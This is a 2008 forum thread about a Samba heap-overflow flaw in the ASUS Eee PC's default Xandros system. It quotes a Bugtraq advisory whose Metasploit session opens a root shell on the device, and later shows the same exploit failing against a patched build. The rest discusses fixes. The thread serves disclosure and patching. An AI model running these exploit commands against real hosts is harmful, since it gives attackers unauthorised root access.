91 replies to this topic

[chrismoo]

From Bugtraq:

Seems the EEE is left open and as they say: Easy to learn, Easy to work, Easy to root

Don't know if this is serious but should people be worried?



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

We recently acquired an ASUS Eee PC (if you want to know more about it, a lot of reviews are available on internet). The first thing we did when we put our hands at the ASUS Eee PC was to test its security. The ASUS Eee PC comes with a customized version of Xandros operating system installed, and some other bundled software like Mozilla Firefox, Pidgin, Skype and OpenOffice.org.

Analysing the running processes of the ASUS Eee PC, the first thing that caught our attention was the running smbd process (the sshd daemon was started by us, and is not enabled by default).


eeepc-rise:/root> ps -e
PID TTY TIME CMD
1 ? 00:00:00 fastinit
2 ? 00:00:00 ksoftirqd/0
3 ? 00:00:00 events/0
4 ? 00:00:00 khelper
5 ? 00:00:00 kthread
25 ? 00:00:00 kblockd/0
26 ? 00:00:00 kacpid
128 ? 00:00:00 ata/0
129 ? 00:00:00 ata_aux
130 ? 00:00:00 kseriod
148 ? 00:00:00 pdflush
149 ? 00:00:00 pdflush
150 ? 00:00:00 kswapd0
151 ? 00:00:00 aio/0
152 ? 00:00:00 unionfs_siod/0
778 ? 00:00:00 scsi_eh_0
779 ? 00:00:00 scsi_eh_1
799 ? 00:00:00 kpsmoused
819 ? 00:00:00 kjournald
855 ? 00:00:00 fastinit
857 ? 00:00:00 sh
858 ? 00:00:00 su
859 tty3 00:00:00 getty
862 ? 00:00:00 startx
880 ? 00:00:00 xinit
881 tty2 00:00:06 Xorg
890 ? 00:00:00 udevd
952 ? 00:00:00 ksuspend_usbd
953 ? 00:00:00 khubd
1002 ? 00:00:00 acpid
1027 ? 00:00:00 pciehpd_event
1055 ? 00:00:00 ifplugd
1101 ? 00:00:00 scsi_eh_2
1102 ? 00:00:00 usb-storage
1151 ? 00:00:00 icewm
1185 ? 00:00:01 AsusLauncher
1186 ? 00:00:00 icewmtray
1188 ? 00:00:01 powermonitor
1190 ? 00:00:00 minimixer
1191 ? 00:00:00 networkmonitor
1192 ? 00:00:00 wapmonitor
1193 ? 00:00:00 x-session-manag
1195 ? 00:00:00 x-session-manag
1200 ? 00:00:00 x-session-manag
1201 ? 00:00:00 dispwatch
1217 ? 00:00:00 cupsd
1224 ? 00:00:00 usbstorageapple
1234 ? 00:00:00 kondemand/0
1240 ? 00:00:00 portmap
1248 ? 00:00:00 keyboardstatus
1272 ? 00:00:00 memd
1279 ? 00:00:00 scim-helper-man
1280 ? 00:00:00 scim-panel-gtk
1282 ? 00:00:00 scim-launcher
1297 ? 00:00:00 netserv
1331 ? 00:00:00 asusosd
1476 ? 00:00:00 xandrosncs-agen
1775 ? 00:00:00 dhclient3
2002 ? 00:00:00 nmbd
2004 ? 00:00:00 smbd
2005 ? 00:00:00 smbd
2322 ? 00:00:00 sshd
2345 ? 00:00:00 sshd
2356 pts/0 00:00:00 bash
2362 pts/0 00:00:00 ps
eeepc-rise:/root>


Retrieving the the smbd version, we discovered that it runs a vulnerable version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit we published earlier last year.


eeepc-rise:/root> smbd --version
Version 3.0.24
eeepc-rise:/root>


With this information, we ran our exploit against the ASUS Eee PC using the Debian/Ubuntu target (Xandros is based on Corel Linux, which is Debian based).


msf > use linux/samba/lsa_transnames_heap msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10 RHOST => 192.168.50.10 msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp PAYLOAD => linux/x86/shell_bind_tcp msf exploit(lsa_transnames_heap) > show targets

Exploit targets:

Id Name
-- ----
0 Linux vsyscall
1 Linux Heap Brute Force (Debian/Ubuntu)
2 Linux Heap Brute Force (Gentoo)
3 Linux Heap Brute Force (Mandriva)
4 Linux Heap Brute Force (RHEL/CentOS)
5 Linux Heap Brute Force (SUSE)
6 Linux Heap Brute Force (Slackware)
7 DEBUG


msf exploit(lsa_transnames_heap) > set TARGET 1 TARGET => 1 msf exploit(lsa_transnames_heap) > exploit [*] Started bind handler [*] Creating nop sled....
...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Bound to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected [*] Command shell session 1 opened (192.168.50.201:33694 ->
192.168.50.10:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1 [*] Starting interaction with 1...

uname -a
Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686 GNU/Linux id
uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)


Easy to learn, Easy to work, Easy to root.


The original blog post and more information can be found in our website at http://risesecurity.org/.

Best regards,
RISE Security
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFHrIdmhFjK78TGSUERAnQRAKC+y18h92I4cTnjmDJkTKfdtbno2ACgkdqs
v7aF1eU5H9uSfL4zU5AWCB4=
=pDq2
-----END PGP SIGNATURE-----

Edited by chrismoo, 08 February 2008 - 07:24 PM.

[BCTripster]

If security is a concern for anyone using the eee then they should definitely switch it to a full blown Linux distro of some sort. The default Xandros install is not aimed at security but ease of use and certain standard security features in Linux are disabled by default (like multiuser for example :)).

That being said, as this is a highly portable computer it is best to NOT store sensitive data on it.

[chrismoo]

But being ultra portable in some respects demands security as you're off connecting to public access points, etc. Being able to root into other peoples machines is a little too easy from looking at this (at a very basic level).

I agree though sensitive info should not be on it or it should be encrypted but that's more than Joe Public would contemplate doing.

[mkrishnan]

I tend to agree, though... yeah, these are all relevant complaints, but we're talking about a PC that doesn't require a password for root access and doesn't even have a screen locking function. This analysis is light years ahead of where the Eee's security actually is.

And yeah, security was about 65% of my decision to leave Xandros for Ubuntu. Windows could be tightened down adequately of course, also, although Ubuntu is generally nicer. :)

Regarding what the average user would do, that's a valid point, although the way most Windows PCs are set up -- no user password and/or automated login are common even on notebooks in my experience -- I'm not sure how an OEM would be expected to broach this topic with the user. Harder though in Asus' case where there's no easy solution inside their OS build for most of those issues. Basically one should not keep any sensitive data on the Eee at all if one uses the default installation.

[lagagnon]

One has to take the Bugtraq reports with a grain of salt. They are extremely conservative, and honestly, I wouldn't worry about it too much. MANY Linux distros run smbd by default so that newbies can connect to their Windows shares. Otherwise the newbs have to learn how to start and stop the daemon. If you really want to you can quite easily turn off smbd (if you don't intend to use Samba). I'm not on my Eee box right now but I think all you have to do is go into /etc/rc.d (or is it init.d?) and find the file rc.samba and make it non-executable.

[chrismoo]

I think it is the version of smbd that is the problem, an update/patch would probably suffice if this is possible - I am predominately Windows so would not know what advice to offer in terms of fixing the solution. Still I think this is a valid concern and worth highlighting as with what Mohan says we should all try and educate a little security wise and maybe do more to improve on the openness of the OS e.g. having a login screen/password :D and fixing any stray/open security issues.

[bookmark]

So.. should we be worried?

and what exactly is smbd for? (-__-)>??
thanks

[BCTripster]

I wouldn't fret over this much, essentially for it to be exploited you'd have to be on the same local network as someone with the knowledge they can access a connected eee's root user account. Such a person could wait forever for an eee to appear on their network :)

I'm sure a patched version will be released on the updater since they are aware of it, but I still say there are bigger worries than someone possibly using this exploit to gain access to your eee. They'd be better off just taking it since it really has next to no security features in the default OS.

That is part of the reason I switched mine to Xubuntu .. at least the thieves would get prompted for a password at boot up, but I also don't keep anything sensitive on it anyway.

Here is all the info you'll need on smdb (Samba)

Edited by BCTripster, 09 February 2008 - 07:27 AM.

[bookmark]

Quote

I wouldn't fret over this much, essentially for it to be exploited you'd have to be on the same local network as someone with the knowledge they can access a connected eee's root user account. Such a person could wait forever for an eee to appear on their network :)

I'm sure a patched version will be released on the updater since they are aware of it, but I still say there are bigger worries than someone possibly using this exploit to gain access to your eee. They'd be better off just taking it since it really has next to no security features in the default OS.

That is part of the reason I switched mine to Xubuntu .. at least the thieves would get prompted for a password at boot up, but I also don't keep anything sensitive on it anyway.

Here is all the info you'll need on smdb (Samba)

:O oh thank you, i thought they can do that though the internet.

[Engineer]

Quote

From Bugtraq:
. . .
Retrieving the the smbd version, we discovered that it runs a vulnerable version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit we published earlier last year.
. . .

Seems that Asus/Xandros is not updating the EEE's OS. I suspect that Asus paid Xandros once for the customization to the EEE and then decided to spend no more money on software.

[mkrishnan]

It's not just Asus... Xandros is not frequently updated altogether. The versions of Xandros outside of the Eee are generally behind on a lot of things also, because they release updates once every couple of years, whereas Ubuntu for instance does so twice yearly. And I'm not even sure to what extent Xandros is in the habit of publishing security updates or things like that.

[Engineer]

Let us hope that major Linux distributors ((K)Ubuntu, debian, opensuse, redhat/fedora, etc will see the EEE as a market (Asus plans to sell millions this year) integrate the EEE's drivers (display, acpi, webcam, etc), and offer configurations for the small screen.

Then we will not depend on Asus/Xandros any more.

And let us hope that Asus' field-tests of different BIOS variants produce enough data so that they can code a stable version.

[pksato]

You need to eeepc share files with windows systems?
Not, simple, remove samba package.

[bookmark]

Quote

You need to eeepc share files with windows systems?
Not, simple, remove samba package.

Can you write us a tutorial for that please?

[wormie]

Quote

Quote

You need to eeepc share files with windows systems?
Not, simple, remove samba package.

Can you write us a tutorial for that please?

1) Open a terminal
2) Type "apt-get remove samba"
3) Samba is removed

Of if you just want to temporarily disable it:
1) Open a terminal
2) Type "/etc/init.d/samba stop"
3) Breathe easy

Personally, I just plan to disable it when in an insecure environment.

[Paul In SF]

Quote

Quote

Quote

You need to eeepc share files with windows systems?
Not, simple, remove samba package.

Can you write us a tutorial for that please?

1) Open a terminal
2) Type "apt-get remove samba"
3) Samba is removed

Of if you just want to temporarily disable it:
1) Open a terminal
2) Type "/etc/init.d/samba stop"
3) Breathe easy
.

And to start it again?

[van der Decken]

Quote

Personally, I just plan to disable it when in an insecure environment.

Hey there's an idea. Add a script to /etc/network/if-up.d/ to bring up Samba if you're on your home network. Add another to /etc/network/if-down.d/ to bring it down. That way you don't even have to think about it when you're out and connected to a public network; it won't even get turned on.

[kost]

UPGRADE YOUR SAMBA!

I built new Samba packages fixing problem above.
You need to add ftp.linux.hr repository as stated in this topic:
http://forum.eeeuser...ic.php?id=13623

Note that you need to change pinning of ftp.linux.hr repository to be higher than updates of asus/xandros (at least while asus/xandros issues the patch).
I've put 955 in priority field. E.g. - you should put:
Package: *
Pin: origin ftp.linux.hr
Pin-Priority: 955

Then issue:
sudo apt-get update
sudo apt-get upgrade

I tried to make everything compatible with other original xandros packages, so nothing should broke.

I also tried to exploit mentioned vulnerability using this security update and vulnerability is not present any more after update, look for yourself:

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


       =[ msf v3.1-release
+ -- --=[ 265 exploits - 118 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 46 aux

msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.9.80
RHOST => 192.168.9.80
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux vsyscall
   1   Linux Heap Brute Force (Debian/Ubuntu)
   2   Linux Heap Brute Force (Gentoo)
   3   Linux Heap Brute Force (Mandriva)
   4   Linux Heap Brute Force (RHEL/CentOS)
   5   Linux Heap Brute Force (SUSE)
   6   Linux Heap Brute Force (Slackware)
   7   DEBUG


msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0x08352000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08361000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08370000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x0837f000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x0838e000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x0839d000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083ac000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083bb000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083ca000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083d9000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083e8000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083f7000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08406000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08424000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08433000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
msf exploit(lsa_transnames_heap) >

[billy_b0b]

i saw this on engadget earlier today. just upgrade to xunbuntu or win xp

[bookmark]

still can't manage to add repository + Pinning.. etc... (-__-)
too complicate for me...

Edited by bookmark, 10 February 2008 - 04:17 AM.